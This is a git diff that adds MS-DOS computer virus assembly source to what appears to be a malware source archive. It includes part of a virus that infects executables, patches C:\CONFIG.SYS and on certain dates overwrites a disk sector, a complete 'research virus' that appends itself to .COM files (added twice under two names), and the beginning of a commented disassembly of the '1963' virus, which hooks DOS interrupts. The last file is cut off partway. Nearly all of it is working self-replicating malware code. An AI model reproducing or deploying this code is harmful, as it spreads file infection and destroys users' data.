; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jnc loc_0B51 ; Jump if carry=0 + jmp short loc_0BB7 + db 90h +loc_0B51: + mov si,ax + mov cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_0BB7 ; Jump if carry Set + pop dx + mov ax,di + add ax,si + add ax,100h + cmp ax,200h + jb loc_0B6D ; Jump if below + and ax,1FFh + inc dx +loc_0B6D: + mov cl,4 + shr ax,cl ; Shift w/zeros fill + dec dx + mov cl,5 + shl dx,cl ; Shift w/zeros fill + sub dx,ds:d_9E01_0008_e + add ax,dx + sub ax,10h + mov ds:d_9E01_0016_e,ax + mov word ptr ds:d_9E01_0014_e,100h + push ds + mov ax,cs + mov ds,ax + mov cx,data_011C + mov dx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop ds + jc loc_0BB7 ; Jump if carry Set + call sub_0BB9 + mov ds:d_9E01_0002_e,di + mov ds:d_9E01_0004_e,ax + mov ax,4200h + xor dx,dx ; Zero register + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_0BB7 ; Jump if carry Set + mov cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_0BB7: + pop ds + retn +sub_0B1D endp + + +; +; SUBROUTINE +; + +sub_0BB9 proc near + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov di,ax + and di,1FFh + mov cl,9 + shr ax,cl ; Shift w/zeros fill + mov cl,7 + shl dx,cl ; Shift w/zeros fill + add ax,dx + inc ax + retn +sub_0BB9 endp + + +; +; SUBROUTINE +; + +sub_0BD4 proc near + mov ax,data_0108 + mov data_0120,ax + mov cx,data_011C + cmp cx,ax + jb loc_0BEA ; Jump if below + mov data_0120,cx + mov cx,data_0108 +loc_0BEA: + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + pop ds + jc loc_ret_0C3F ; Jump if carry Set + mov ax,4200h + xor dx,dx ; Zero register + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_ret_0C3F ; Jump if carry Set + mov dx,100h + mov cx,data_011C + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_ret_0C3F ; Jump if carry Set + cmp ax,data_0108 + ja loc_0C2E ; Jump if above + mov ax,4200h + mov dx,data_0108 + mov data_0120,dx + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_ret_0C3F ; Jump if carry Set + mov cx,data_011C + jmp short loc_0C32 +loc_0C2E: + mov cx,data_0108 +loc_0C32: + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + xor dx,dx ; Zero register + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop ds + +loc_ret_0C3F: + retn +sub_0BD4 endp + + +; +; SUBROUTINE +; + +sub_0C40 proc near + cmp data_011B,2 + ja loc_0C4A ; Jump if above + xor ax,ax ; Zero register + retn +loc_0C4A: + mov al,data_0133 + and al,1 + retn +sub_0C40 endp + + +; +; SUBROUTINE +; + +sub_0C50 proc near + cmp data_0133,0Fh + jb loc_0C69 ; Jump if below + mov al,data_0135 + cmp al,13h + jb loc_0C69 ; Jump if below + mov ax,40h + mov es,ax + mov byte ptr es:d_0040_004A_e,23h ; '#' +loc_0C69: + cmp data_0133,0Dh + jne loc_ret_0C86 ; Jump if not equal + cmp data_0134,5 + jne loc_ret_0C86 ; Jump if not equal + mov ax,301h + mov cx,1 + mov dx,50h + xor bx,bx ; Zero register + mov es,bx + int 13h ; Disk dl=drive ? ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + +loc_ret_0C86: + retn +sub_0C50 endp + + +; +; SUBROUTINE +; + +sub_0C87 proc near + mov data_019B,1 + lea dx,data_05C1 ; Load effective addr + mov cx,27h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jnc loc_0CC6 ; Jump if carry=0 + mov ah,3Ch ; '<' + mov cx,6 + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + mov bx,ax + lea dx,data_05EE ; Load effective addr + mov cx,data_070A + mov si,dx + add si,data_00B3_e + mov ax,data_0130 + mov [si],ax + mov ah,data_0132 + mov [si+2],ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jc loc_0D1F ; Jump if carry Set +loc_0CC6: + lea dx,data_05C7 ; ('C:\CONFIG.SYS') Load effective add + mov cx,27h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_0D1F ; Jump if carry Set + call sub_0ACE + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + jc loc_0D1F ; Jump if carry Set + mov cx,data_0108 + push es + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + mov es,ax + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + pop ds + mov dx,ax + mov ax,0FFFFh + xor di,di ; Zero register + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp ax,es:[di-1] + pop es + jz loc_0D1F ; Jump if zero + mov ax,4200h + xor cx,cx ; Zero register + dec dx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_0D1F ; Jump if carry Set + lea dx,data_05D5 ; ('DEVICE =') Load effective addr + mov cx,19h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_0D1F: + call sub_0ADF + retn +sub_0C87 endp + + inc bx + cmp bl,[si-1] + inc word ptr [bx+si] + inc bx + cmp bl,[si+43h] + dec di + dec si + inc si + dec cx + inc di + db 2Eh, 53h, 59h, 53h, 00h + db 'DEVICE =' + db 0FFh,0FFh + db ' COUNTRY.SYS', 0Dh, 0Ah + db 1Ah,0FFh,0FFh,0FFh,0FFh, 40h + db 0C8h, 16h, 00h, 21h, 00h + db 'hgt42 ' + db 00h, 00h, 00h, 00h, 2Eh, 89h + db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h + db 14h, 00h,0CBh, 1Eh, 06h, 0Eh + db 1Fh,0C4h, 3Eh, 12h, 00h, 26h + db 8Ah, 45h, 02h, 3Ch, 00h, 75h + db 03h,0E8h, 82h, 00h + db 0Dh, 00h, 10h, 26h, 89h, 45h + db 03h, 07h, 1Fh,0CBh, 50h, 53h + db 51h, 1Eh + db 0E4h, 60h,0A8h, 80h, 75h, 30h + db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah + db 0C7h, 75h, 27h,0B8h, 40h, 00h + db 8Eh,0D8h,0E8h, 28h, 00h, 25h + db 05h, 00h, 8Bh,0C8h + db 0BBh, 1Ch, 00h + +locloop_0DB1: + mov ax,cs:data_00A9_e + mov [bx],ax + add bx,2 + cmp bx,3Fh + jb loc_0DC2 ; Jump if below + mov bx,1Eh +loc_0DC2: + mov word ptr ds:[1Ch],bx + loop locloop_0DB1 ; Loop if cx > 0 + +loc_0DC8: + pop ds + pop cx + pop bx + pop ax + jmp dword ptr cs:data_00A3_e + +; +; SUBROUTINE +; + +sub_0DD1 proc near + mov ax,cs:data_00A7_e + push ax + and ah,0B4h + pop ax + jp loc_0DDD ; Jump if parity=1 + stc ; Set carry flag +loc_0DDD: + rcl ax,1 ; Rotate thru carry + mov cs:data_00A7_e,ax + retn +sub_0DD1 endp + + db 'hgt42 ' + db 00h, 56h, 31h, 00h, 46h, 52h + db 44h, 00h, 00h, 00h, 00h, 00h + db 00h, 65h, 12h, 65h, 73h, 74h + db 6Eh, 12h, 1Fh, 14h, 31h,0CDh + db 0ABh,0EFh + db 06h, 57h,0B4h, 2Ah,0CDh, 21h + db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h + db 74h, 03h, 80h,0C4h + db 0Ch +loc_0E17: + sub ah,ds:data_00B5_e + cmp ah,3 + jb loc_0E5D ; Jump if below + mov ds:data_00B5_e,dh + mov ds:data_00B3_e,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov ds:data_00A7_e,dx + call sub_0DD1 + mov bx,ax + and bx,3 + nop ;*ASM fixup - sign extn byte + mov al,ds:data_00AB_e[bx] + mov ah,ds:data_00AF_e[bx] + mov ds:data_00A9_e,ax + mov ax,3516h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_00A3_e,bx + mov bx,es + mov word ptr ds:data_00A3_e+2,bx + cli ; Disable interrupts +;* mov dx,offset loc_003E ;* + db 0BAh, 3Eh, 00h + mov ax,2516h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + sti ; Enable interrupts +loc_0E5D: + pop di + pop es + mov word ptr es:[di+0Eh],0B6h + mov es:[di+10h],cs + xor ax,ax ; Zero register + retn + db 1Ch + db 01h, 8Bh, 1Eh, 28h, 01h,0A1h + db 26h, 01h, 8Eh,0D0h, 8Bh, 26h + db 24h, 01h, 83h,0ECh, 04h, 8Bh + db 0F4h, 80h, 3Eh, 1Fh, 01h, 00h + db 75h, 28h,0BFh, 00h, 01h, 36h + db 89h, 3Ch, 8Bh,0FBh, 36h, 89h + db 7Ch, 02h, 33h,0FFh, 36h, 89h + db 7Ch, 04h + db 0BFh, 00h, 01h, 8Bh, 36h, 22h + db 01h, 03h,0F7h, 8Bh, 0Eh, 1Ch + db 01h, 8Ch,0D8h, 8Eh,0C0h,0F3h + db 0A4h,0EBh, 16h, 90h +loc_0EAF: + mov di,bx + add di,10h + mov ax,ds:data_0016_e + add di,ax + mov ss:[si+2],di + mov di,word ptr ds:data_0012_e+2 + mov ss:[si],di +loc_0EC4: + mov ds,bx + mov es,bx + retf ; Return far + db 8Ch,0D0h, 2Eh,0A3h, 26h, 01h + db 2Eh, 89h, 26h, 24h, 01h, 8Ch + db 0C8h, 8Eh,0D0h,0BCh,0F7h, 01h + db 1Eh, 8Eh,0D8h, 58h,0A3h, 28h + db 01h,0E8h,0E6h,0FAh, 8Ch,0C8h + db 8Eh,0C0h,0E8h, 6Dh,0FAh + db 0BAh, 9Dh, 01h,0B4h, 1Ah,0CDh + db 21h,0E8h, 1Bh,0FBh,0E8h, 0Eh + db 0FBh, 73h, 03h,0E9h, 9Eh, 00h +loc_0EFE: + call sub_0989 + jc loc_0F06 ; Jump if carry Set + jmp loc_0F9C +loc_0F06: + call sub_099C + call sub_0A32 + mov data_011E,0 +loc_0F11: + call sub_0AB7 + jc loc_0F62 ; Jump if carry Set +loc_0F16: + cmp data_019C,4 + ja loc_0F9C ; Jump if above + call sub_0ACE + call sub_0AAF + jnc loc_0F5C ; Jump if carry=0 + cmp data_010A,4 + ja loc_0F5C ; Jump if above + call sub_0B08 + jc loc_0F9C ; Jump if carry Set + cmp data_011E,0 + je loc_0F3D ; Jump if equal + call sub_0B1D + jmp short loc_0F40 +loc_0F3D: + call sub_0BD4 +loc_0F40: + call sub_0ADF + jc loc_0F9C ; Jump if carry Set + inc data_019C + cmp data_019B,1 + je loc_0F5C ; Jump if equal + call sub_0C40 + jz loc_0F5C ; Jump if zero + call sub_0C87 + jc loc_0F9C ; Jump if carry Set + jmp short loc_0F11 +loc_0F5C: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_0F16 ; Jump if carry=0 +loc_0F62: + cmp data_011E,1 + je loc_0F70 ; Jump if equal + mov data_011E,1 + jmp short loc_0F11 +loc_0F70: + mov data_011E,0 + cmp data_019A,0 + jne loc_0F8B ; Jump if not equal + lea dx,data_015A ; ('C:\') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov data_019A,0FFh + jmp short loc_0F11 +loc_0F8B: + cmp data_0182,0 + je loc_0F9C ; Jump if equal + call sub_0A8A + dec data_0182 + jmp loc_0F11 +loc_0F9C: + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + call sub_0C40 + jz loc_0FAC ; Jump if zero + call sub_0C50 +loc_0FAC: + mov ax,word ptr data_012C+2 + mov es,ax + mov cx,5Bh + mov si,offset data_070C + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + call sub_09EE + call data_012C + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.189.asm b/MSDOS/Virus.MSDOS.Unknown.189.asm new file mode 100644 index 00000000..46177d13 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.189.asm @@ -0,0 +1,152 @@ +;*************************************************************************** +;* * +;* 196 - Research Virus Version 1.01 Date. 11th April 1992. * +;* * +;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) * +;* * +;* Non-Overwriting Version of 97 Virus * +;* * +;*************************************************************************** + +CODE Segment + Assume CS:CODE + +progr equ 100h + + org progr + +virus_size EQU vir_end-vir_start +variable_diff EQU variables_start-next_byte + +highlander: + call vir_start ;call virus + mov ah,4ch ;return to operating system + int 21h ;thru' dos interrupt 21h + +vir_start: + call next_byte ;call next address + +next_byte: + pop ax ;get virus address + pop di ;get program start address + push ax ;save virus address + + pop si ;get address of next_byte + mov ax,variable_diff ;add difference + add si,ax ;get variables address + + mov ax,3 ;move to old address + sub di,ax ;start of .com file + add si,ax ;point to old code + mov ax,[si] ;get two bytes from old code + mov [di],ax ;and place at start of file + inc si ;increment to third byte + inc si ; + inc di ;increment to third address to save + inc di ; + mov al,[si] ;get last byte of old code + mov [di],al ;and place at start of .COM file + mov ax,5 ;five bytes out + sub si,ax ;back to start of variables + + mov di,si ;which is copied to destination + mov ax,6 ;add 6 to variables address + add di,ax ;and save file control block + +;search for first + mov ah,4eh ;search for first + xor cx,cx ;attributes to search + mov dx,di ;point to fcb + int 21h ;call dos + jc return_to_prog ;if no file found return to program + +found_one: + mov ah,2fh ;get DTA address into es:bx + int 21h ;call dos + mov ax,22 ;jump over to time + add bx,ax ;and point to it + mov al,es:[bx] ;and place in ax + and al,00000111b ;get seconds only + cmp al,00h ;zero seconds? + jnz infect_program ;if not infect program + mov ah,4fh ;find next file + int 21h ;call dos + jmp short found_one ;jump back + +infect_program: + mov ax,8 ;jump to asciiz fcb + add ax,bx ;add to bx + mov dx,ax ;and move to dx + mov ax,3d02h ;open file for writing + int 21h ;call dos + jnc continue ;continue if no error + + mov ah,4fh ;search for next + xor cx,cx ;attributes to search + int 21h ;call dos + jc return_to_prog ;if no file found return to program + jmp short found_one ;jump forward if one found + +continue: + mov bx,ax ;transfer file handle to bx + +;read first three bytes + mov ah,3fh ;read file + mov cx,3 ;number of bytes to read + mov dx,3 ;three bytes to old_code + add dx,si ;point to buffer to read + int 21h ;call dos + + mov ax,4202h ;move file pointer to end of file + xor cx,cx ;clear cx + xor dx,dx ;clear dx + int 21h ;call dos + dec ax ;decrement ax + dec ax ; + dec ax ; + dec si ;save address + mov word [si],ax ;and store + + mov ah,40h ;write to file + mov cx,virus_size ;set counter to write + mov dx,offset vir_start ;point to buffer to start + int 21h ;and write to file + + mov ax,4200h ;move file pointer to start of file + xor cx,cx ;clear cx + xor dx,dx ;clear dx + int 21h ;call dos + + mov ah,40h ;write to file + mov cx,3 ;set counter to write + inc si ;point to jump address + mov dx,si ;point to buffer to start + int 21h ;and write to file + + mov ax,5701h ;set date & time + xor cx,cx ;time set to zero + xor dx,dx ;and date + int 21h ;and do it + mov ah,3eh ;close file + int 21h ;thru' dos + +return_to_prog: + mov ah,4ch ;terminate program + int 21h ;exit to dos + +variables_start: +jump_add: + db 0e8h,0,0 +old_code: + db 90h,90h,90h +fcb: + db "*.COM",0 +variables_end: + +vir_end: + +CODE ENDS + + END highlander + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.196.asm b/MSDOS/Virus.MSDOS.Unknown.196.asm new file mode 100644 index 00000000..46177d13 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.196.asm @@ -0,0 +1,152 @@ +;*************************************************************************** +;* * +;* 196 - Research Virus Version 1.01 Date. 11th April 1992. * +;* * +;* Written By : F.Deakin (ACE COMPUTER SYSTEMS) * +;* * +;* Non-Overwriting Version of 97 Virus * +;* * +;*************************************************************************** + +CODE Segment + Assume CS:CODE + +progr equ 100h + + org progr + +virus_size EQU vir_end-vir_start +variable_diff EQU variables_start-next_byte + +highlander: + call vir_start ;call virus + mov ah,4ch ;return to operating system + int 21h ;thru' dos interrupt 21h + +vir_start: + call next_byte ;call next address + +next_byte: + pop ax ;get virus address + pop di ;get program start address + push ax ;save virus address + + pop si ;get address of next_byte + mov ax,variable_diff ;add difference + add si,ax ;get variables address + + mov ax,3 ;move to old address + sub di,ax ;start of .com file + add si,ax ;point to old code + mov ax,[si] ;get two bytes from old code + mov [di],ax ;and place at start of file + inc si ;increment to third byte + inc si ; + inc di ;increment to third address to save + inc di ; + mov al,[si] ;get last byte of old code + mov [di],al ;and place at start of .COM file + mov ax,5 ;five bytes out + sub si,ax ;back to start of variables + + mov di,si ;which is copied to destination + mov ax,6 ;add 6 to variables address + add di,ax ;and save file control block + +;search for first + mov ah,4eh ;search for first + xor cx,cx ;attributes to search + mov dx,di ;point to fcb + int 21h ;call dos + jc return_to_prog ;if no file found return to program + +found_one: + mov ah,2fh ;get DTA address into es:bx + int 21h ;call dos + mov ax,22 ;jump over to time + add bx,ax ;and point to it + mov al,es:[bx] ;and place in ax + and al,00000111b ;get seconds only + cmp al,00h ;zero seconds? + jnz infect_program ;if not infect program + mov ah,4fh ;find next file + int 21h ;call dos + jmp short found_one ;jump back + +infect_program: + mov ax,8 ;jump to asciiz fcb + add ax,bx ;add to bx + mov dx,ax ;and move to dx + mov ax,3d02h ;open file for writing + int 21h ;call dos + jnc continue ;continue if no error + + mov ah,4fh ;search for next + xor cx,cx ;attributes to search + int 21h ;call dos + jc return_to_prog ;if no file found return to program + jmp short found_one ;jump forward if one found + +continue: + mov bx,ax ;transfer file handle to bx + +;read first three bytes + mov ah,3fh ;read file + mov cx,3 ;number of bytes to read + mov dx,3 ;three bytes to old_code + add dx,si ;point to buffer to read + int 21h ;call dos + + mov ax,4202h ;move file pointer to end of file + xor cx,cx ;clear cx + xor dx,dx ;clear dx + int 21h ;call dos + dec ax ;decrement ax + dec ax ; + dec ax ; + dec si ;save address + mov word [si],ax ;and store + + mov ah,40h ;write to file + mov cx,virus_size ;set counter to write + mov dx,offset vir_start ;point to buffer to start + int 21h ;and write to file + + mov ax,4200h ;move file pointer to start of file + xor cx,cx ;clear cx + xor dx,dx ;clear dx + int 21h ;call dos + + mov ah,40h ;write to file + mov cx,3 ;set counter to write + inc si ;point to jump address + mov dx,si ;point to buffer to start + int 21h ;and write to file + + mov ax,5701h ;set date & time + xor cx,cx ;time set to zero + xor dx,dx ;and date + int 21h ;and do it + mov ah,3eh ;close file + int 21h ;thru' dos + +return_to_prog: + mov ah,4ch ;terminate program + int 21h ;exit to dos + +variables_start: +jump_add: + db 0e8h,0,0 +old_code: + db 90h,90h,90h +fcb: + db "*.COM",0 +variables_end: + +vir_end: + +CODE ENDS + + END highlander + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1963.asm b/MSDOS/Virus.MSDOS.Unknown.1963.asm new file mode 100644 index 00000000..7449bfa5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1963.asm @@ -0,0 +1,1292 @@ + +PAGE 59,132 + +; +; +; 1963 VIRUS +; +; disassembly by +; +; DecimatoR / SKISM +; +; 01/15/92 Compile with TASM 2.0 DW 717-367-3501 +; + +data_1e equ 4 ; (0000:0004=7FBh) +data_2e equ 6 ; (0000:0006=70h) +data_3e equ 4Ch ; (0000:004C=88h) +data_4e equ 84h ; (0000:0084=16h) +data_6e equ 0Ah ; (0046:000A=0) +data_7e equ 16h ; (0046:0016=0) +data_8e equ 2Ch ; (0046:002C=50h) +data_9e equ 8ABh ; (0046:08AB=4146h) +data_10e equ 8ADh ; (0046:08AD=3154h) +data_11e equ 0Ah ; (08D4:000A=2F9h) +data_12e equ 0Ch ; (08D4:000C=3872h) +data_13e equ 100h ; (08D4:0100=0DFh) +data_14e equ 1 ; (4815:0001=0FFFFh) +data_15e equ 100h ; (4816:0100=0FFh) +data_16e equ 1 ; (8343:0001=0FFFFh) +data_17e equ 0Ah ; (8344:000A=0) +data_18e equ 0Eh ; (8344:000E=8344h) +data_49e equ 900h ; (8344:0900=0) +data_50e equ 902h ; (8344:0902=0) +data_51e equ 904h ; (8344:0904=8344h) +data_52e equ 906h ; (8344:0906=0) +data_53e equ 9EFh ; (8344:09EF=0) +data_54e equ 10AFh ; (8344:10AF=0) +data_55e equ 10B1h ; (8344:10B1=0) +data_56e equ 10B3h ; (8344:10B3=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +virus proc far + +start: + mov ah,30h ; '0' + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + cmp al,3 + jb loc_1 ; Jump if below + mov ax,1200h + int 2Fh ; Multiplex/Spooler al=func 00h + ; get installed status + cmp al,0FFh +loc_1: + mov ax,0Bh + jc loc_4 ; Jump if carry Set + mov ah,4Ah ; 'J' + mov bx,140h + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + jc loc_4 ; Jump if carry Set + cli ; Disable interrupts + push cs + pop ss + mov sp,13FEh + call sub_1 ; (01EB) + sti ; Enable interrupts + mov ax,ds:data_8e ; (0046:002C=50h) + or ax,ax ; Zero ? + jz loc_5 ; Jump if zero + call sub_13 ; (07EC) + mov es,ax + xor di,di ; Zero register + xor ax,ax ; Zero register +loc_2: + scasw ; Scan es:[di] for ax + jnz loc_2 ; Jump if not zero + scasw ; Scan es:[di] for ax + mov dx,di + push es + pop ds + mov ah,48h ; 'H' + mov bx,0FFFFh + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + xor ax,ax ; Zero register + mov cx,bx + mov bx,es + +locloop_3: + push cx + mov cx,8 + xor di,di ; Zero register + rep stosw ; Rep when cx >0 Store ax to es:[di] + inc bx + mov es,bx + pop cx + loop locloop_3 ; Loop if cx > 0 + + push cs + pop es + mov bx,data_51e ; (8344:0904=44h) + mov di,bx + stosw ; Store ax to es:[di] + mov al,80h + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + mov ax,5Ch + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + mov ax,6Ch + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + mov ax,4B00h + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx +loc_4: + push cs + pop ds + call sub_13 ; (07EC) + jmp dword ptr cs:data_17e ; (8344:000A=0) +loc_5: + mov ax,1220h + mov bx,5 + int 2Fh ; ??INT Non-standard interrupt. + push bx + dec bx + dec bx + mov es:[di],bl + mov ax,1216h + int 2Fh ; ??INT Non-standard interrupt. + dec bx + dec bx + mov es:[di],bx + mov ah,48h ; 'H' + mov bx,0FFFFh + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov ds,ax + pop bx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,3Fh ; '?' + mov dx,data_15e ; (4816:0100=0FFh) + mov cx,es:[di+11h] + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + jc loc_4 ; Jump if carry Set + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov ah,26h ; '&' + mov dx,ds + int 21h ; DOS Services ah=function 26h + ; create progm seg prefix dx + dec dx + mov es,dx + mov es:data_14e,ds ; (4815:0001=0FFFFh) + inc dx + mov es,dx + mov ss,dx + mov sp,0FFFEh + push ds + mov ax,100h + push ax + retf ; Return far + +virus endp + +; +; SUBROUTINE +; + +sub_1 proc near + push ds + mov ax,1203h + int 2Fh ; Multiplex/Spooler al=func 03h + ; remove all files from queue + mov cs:data_51e,ds ; (8344:0904=8344h) + xor si,si ; Zero register + mov ds,si + mov di,288h + mov si,cs + xchg di,ds:data_1e ; (0000:0004=7FBh) + xchg si,ds:data_2e ; (0000:0006=70h) + pushf ; Push flags + pushf ; Push flags + pushf ; Push flags + mov bp,sp + or byte ptr [bp+1],1 + popf ; Pop flags + pushf ; Push flags + pushf ; Push flags + mov word ptr cs:data_52e,8AFh ; (8344:0906=0) + mov ah,1 + call dword ptr ds:data_3e ; (0000:004C=2288h) + popf ; Pop flags + mov word ptr cs:data_52e,8ABh ; (8344:0906=0) + mov ah,0Bh + call dword ptr ds:data_4e ; (0000:0084=1716h) + popf ; Pop flags + mov ds:data_1e,di ; (0000:0004=7FBh) + mov ds:data_2e,si ; (0000:0006=70h) + pop ds + push ds + push es + mov bx,cs + mov bp,2AEh + mov ax,ds:data_9e ; (0046:08AB=4146h) + mov dx,ds:data_10e ; (0046:08AD=3154h) + xor si,si ; Zero register + mov ds,si + cmp ax,ds:data_4e ; (0000:0084=1716h) + jne loc_6 ; Jump if not equal + cmp dx,word ptr ds:data_4e+2 ; (0000:0086=2C7h) + jne loc_6 ; Jump if not equal + mov ds:data_4e,bp ; (0000:0084=1716h) + mov word ptr ds:data_4e+2,bx ; (0000:0086=2C7h) + jmp short loc_10 ; (0285) +loc_6: + mov ax,8ABh + mov es,bx + mov cx,10h + cld ; Clear direction + +locloop_7: + mov di,ax + mov ds,dx + cmpsw ; Cmp [si] to es:[di] + jnz loc_9 ; Jump if not zero + cmpsw ; Cmp [si] to es:[di] + jnz loc_8 ; Jump if not zero + mov [si-4],bp + mov [si-2],bx +loc_8: + dec si + dec si +loc_9: + dec si + loop locloop_7 ; Loop if cx > 0 + + xchg si,cx + inc dx + cmp dx,bx + jne locloop_7 ; Jump if not equal +loc_10: + pop es + pop ds + retn +sub_1 endp + + push bp + mov bp,sp + push ax + mov ax,[bp+4] + cmp ax,cs:data_51e ; (8344:0904=8344h) + ja loc_11 ; Jump if above + push bx + mov bx,cs:data_52e ; (8344:0906=0) + mov cs:[bx+2],ax + mov ax,[bp+2] + mov cs:[bx],ax + and byte ptr [bp+7],0FEh + pop bx +loc_11: + pop ax + pop bp + iret ; Interrupt return + db 55h, 8Bh,0ECh, 80h,0FCh, 48h + db 74h, 0Ah, 80h,0FCh, 4Ah, 74h + db 05h, 3Dh, 03h, 4Bh, 75h, 0Ch + db 0E8h, 89h, 05h,0E8h,0AFh, 05h + db 9Ch,0E8h, 87h, 05h,0EBh, 55h + db 80h,0FCh, 31h, 74h, 05h, 80h + db 0FCh + db 4Ch, 75h, 0Dh +loc_12: + push bx + mov bx,13h +loc_13: + call sub_5 ; (0532) + dec bx + jns loc_13 ; Jump if not sign + pop bx + jmp short loc_23 ; (0342) +loc_14: + cmp ah,0Fh + je loc_15 ; Jump if equal + cmp ah,10h + je loc_15 ; Jump if equal + cmp ah,17h + je loc_15 ; Jump if equal + cmp ah,23h ; '#' + jne loc_16 ; Jump if not equal +loc_15: + call sub_15 ; (081F) + jmp short loc_23 ; (0342) +loc_16: + cmp ah,3Fh ; '?' + jne loc_20 ; Jump if not equal + call sub_5 ; (0532) + jnc loc_18 ; Jump if carry=0 + mov ax,5 +loc_17: + jmp loc_37 ; (0403) +loc_18: + jnz loc_23 ; Jump if not zero + call sub_22 ; (0875) + jc loc_17 ; Jump if carry Set + pushf ; Push flags + call sub_24 ; (0884) + push ds + pop es + mov di,dx + call sub_11 ; (0785) + call sub_25 ; (0896) +loc_19: + popf ; Pop flags + pop bp + retf 2 ; Return far +loc_20: + cmp ah,3Dh ; '=' + je loc_21 ; Jump if equal + cmp ah,43h ; 'C' + je loc_21 ; Jump if equal + cmp ah,56h ; 'V' + jne loc_22 ; Jump if not equal +loc_21: + call sub_3 ; (0519) + jmp short loc_23 ; (0342) +loc_22: + cmp ah,3Eh ; '>' + jne loc_24 ; Jump if not equal + call sub_5 ; (0532) +loc_23: + push word ptr [bp+6] + popf ; Pop flags + pop bp + cli ; Disable interrupts + jmp dword ptr cs:data_20 ; (8344:08AB=0) +loc_24: + cmp ah,14h + je 